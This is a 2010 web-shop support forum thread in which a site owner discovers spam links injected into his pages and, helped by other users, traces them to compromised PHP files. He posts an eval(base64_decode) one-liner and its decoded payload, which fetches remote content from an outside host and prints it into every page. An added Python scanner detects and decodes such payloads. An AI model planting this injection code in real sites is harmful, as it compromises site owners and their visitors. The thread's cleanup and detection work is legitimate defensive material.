wmsgroup Posted June 22, 2010

Well, long story short, I got an email from my client who says a customer noticed his site was down. I went and checked it out and yup, sure enough, it was. There were a few errors listed on the screen and I can't recall what they were exactly. I did a lot of Googling and finally got it back up. EXCEPT... the main portion of the pages including the home page are dropped down and out of place. The site is here. This was partly because I had to find the add-on code in the includes/header.php file that was in there before and I messed up the tables I guess. Why would something like that happen? Is it possible for code to be stripped from a page because of a security addition or server upgrade? I'm just confused and have a 3/4 of the way fixed site.
dlcmpls Posted June 22, 2010

> Well, long story short, I got an email from my client who says a customer noticed his site was down. I went and checked it out and yup, sure enough, it was. There were a few errors listed on the screen and I can't recall what they were exactly. I did a lot of Googling and finally got it back up. EXCEPT... the main portion of the pages including the home page are dropped down and out of place. The site is here. This was partly because I had to find the add-on code in the includes/header.php file that was in there before and I messed up the tables I guess. Why would something like that happen? Is it possible for code to be stripped from a page because of a security addition or server upgrade? I'm just confused and have a 3/4 of the way fixed site.

It's unlikely that code was stripped by the server or by an upgrade. More likely is that you made some unintentional change when you edited the header.php files. Do you have a backup of that file that you can reinstate and test?
germ Posted June 22, 2010

I believe site security has been compromised.... :'( Look at the page source. There are around 500 what appear to be SPAM links at the end of the page. :o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help
wmsgroup (Author) Posted June 22, 2010

> It's unlikely that code was stripped by the server or by an upgrade. More likely is that you made some unintentional change when you edited the header.php files. Do you have a backup of that file that you can reinstate and test?

I may have a backup on another machine, but the funny thing is that I haven't touched the site in well over a year and I do know it has been functioning all this time. But, thank you for the advice. I will see what I have backed up and go from there.
wmsgroup (Author) Posted June 22, 2010

> I believe site security has been compromised.... :'( Look at the page source. There are around 500 what appear to be SPAM links at the end of the page. :o

Oh crap! What can I do and how could this have happened?
germ Posted June 22, 2010

How to Secure Your Site
wmsgroup (Author) Posted June 22, 2010

> How to Secure Your Site

Thanks germ, I just installed FWR Security Pro. Should there be code stuck in the header file that is injecting this spam or could it be coming from somewhere else?
germ Posted June 22, 2010

I'm guessing the rogue code will probably look something like described here. After looking at a few pages in the site I can only see the trash on the index page. Look at the bottom of it.
wmsgroup (Author) Posted June 22, 2010

> Thanks germ, I just installed FWR Security Pro. Should there be code stuck in the header file that is injecting this spam or could it be coming from somewhere else?

I found the following code in virtually every page :'(

    <?php eval(base64_decode('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')); ?>

Which decodes to this:

    if (extension_loaded("curl")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, "http://elumeinc.com/modules/mod_search/license.txt");
        $r = curl_exec($ch);
        curl_close($ch);
    } else {
        $r=implode("",file("http://elumeinc.com/modules/mod_search/license.txt"));
    }
    if($r) print $r;

I copied the url above, pasted it into my browser and voila: http://elumeinc.com/modules/mod_search/license.txt

Wow, what did I get myself into? :blush:
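A scanner for the injected one-liner shown in the post above, added here as an example and not code from the thread or from osCommerce: it finds eval(base64_decode('...')) in PHP source, decodes the payload without executing it, and reports the URLs and remote-fetch calls the payload contains so a whole catalog tree can be triaged offline. The sample PHP file and the example.invalid host are constructed.

```python
import base64
import os
import re

# The injected one-liner as described in the thread: <?php eval(base64_decode('...')); ?>
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Calls a decoded payload typically uses to pull remote content (spam links) into the page.
REMOTE_FETCH = ("curl_exec", "file(", "file_get_contents", "fopen", "fsockopen")


def decode_payload(b64):
    """Decode a base64 payload, tolerating whitespace and missing padding."""
    data = re.sub(r"\s+", "", b64)
    data += "=" * (-len(data) % 4)
    return base64.b64decode(data).decode("utf-8", errors="replace")


def scan_php_source(source, path="<memory>"):
    """Return one finding per eval(base64_decode(...)) in `source`: file, line,
    decoded payload, URLs it contacts and the fetch calls it uses. Nothing is run."""
    findings = []
    for m in EVAL_B64.finditer(source):
        decoded = decode_payload(m.group(1))
        findings.append({
            "path": path,
            "line": source.count("\n", 0, m.start()) + 1,
            "urls": sorted(set(URL_RE.findall(decoded))),
            "fetch_calls": [c for c in REMOTE_FETCH if c in decoded],
            "decoded": decoded,
        })
    return findings


def scan_tree(root):
    """Scan every .php file under `root` (e.g. the catalog directory)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_php_source(fh.read(), full))
    return results


# Constructed sample: the same curl/file() fetch-and-print payload the thread decoded,
# pointed at a placeholder host and base64-encoded here so the file is self-contained.
SAMPLE_PAYLOAD = ('if (extension_loaded("curl")) { $ch = curl_init(); '
                  'curl_setopt($ch, CURLOPT_URL, "http://example.invalid/license.txt"); '
                  '$r = curl_exec($ch); curl_close($ch); } '
                  'else { $r=implode("",file("http://example.invalid/license.txt")); } '
                  'if($r) print $r;')
SAMPLE_PHP = ("<?php\nrequire('includes/application_top.php');\n?>\n<html><body>Hi</body></html>\n"
              "<?php eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
              + "')); ?>\n")
```

Run scan_tree() against a copy of the site and review each finding's decoded field; a hit whose fetch_calls is non-empty is the fetch-and-print injection, while a clean file yields no findings.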
germ Posted June 22, 2010

Your admin isn't protected by a .htaccess file. My first guess is you're a victim of the vulnerabilities in the admin discussed in the first post in the "How to Secure Your Site" thread.
wmsgroup (Author) Posted June 22, 2010

I found it in application_top, deleted and I'm seeing less of it on the other pages. That would be too easy though, so I'll keep digging. This is fun :P
~Kira Posted July 8, 2010

> I found the following code in virtually every page :'(
>
>     <?php eval(base64_decode('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')); ?>
>
> Which decodes to this:
>
>     if (extension_loaded("curl")) {
>         $ch = curl_init();
>         curl_setopt($ch, CURLOPT_TIMEOUT, 30);
>         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
>         curl_setopt($ch, CURLOPT_URL, "http://elumeinc.com/modules/mod_search/license.txt");
>         $r = curl_exec($ch);
>         curl_close($ch);
>     } else {
>         $r=implode("",file("http://elumeinc.com/modules/mod_search/license.txt"));
>     }
>     if($r) print $r;
>
> I copied the url above, pasted it into my browser and voila: http://elumeinc.com/modules/mod_search/license.txt
>
> Wow, what did I get myself into? :blush:

I just found 2 of these at the bottom of a client's index page. I know the eval decode is not a good thing as I just unhacked another shop a couple months ago with the same code. Anyway this also goes to elumeinc.com --- can you tell me what's in that file? My workstation is down and I don't want to open the page. Thanks !!!
germ Posted July 8, 2010

> I found it in application_top, deleted and I'm seeing less of it on the other pages. That would be too easy though, so I'll keep digging. This is fun :P

Look at your page cache in google. The spam is back... :'(